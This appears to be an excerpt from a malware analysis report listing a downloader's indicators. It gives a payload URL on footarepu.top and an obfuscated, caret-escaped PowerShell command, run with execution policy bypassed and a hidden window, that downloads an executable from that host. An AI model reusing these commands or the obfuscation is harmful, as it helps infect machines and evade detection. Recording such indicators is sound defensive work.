Technical Information
- http://footarepu.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oweRSHell.exe ^-^exEC^uTIonpOlicY b^yP^a^ss^ -^No^p^r^oF^I^LE -w^iN^DO^WsTy^L^e ^hI^ddeN (n^eW-oBjEcT SYsT^EM^.NeT^.webc^LIEN^t).d^o^W^n^Lo^aDfi^Le('http://footarepu.top/rea...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "P^oweRSHell.exe ^-^exEC^uTIonpOlicY b^yP^a^ss^ -^No^p^r^oF^I^LE -w^iN^DO^WsTy^L^e ^hI^ddeN (n^eW-oBjEcT SYsT^EM^.NeT^.webc^LIEN^t).d^o^W^n^Lo^aDfi^Le('http://footarepu.top/rea...' (with hidden window)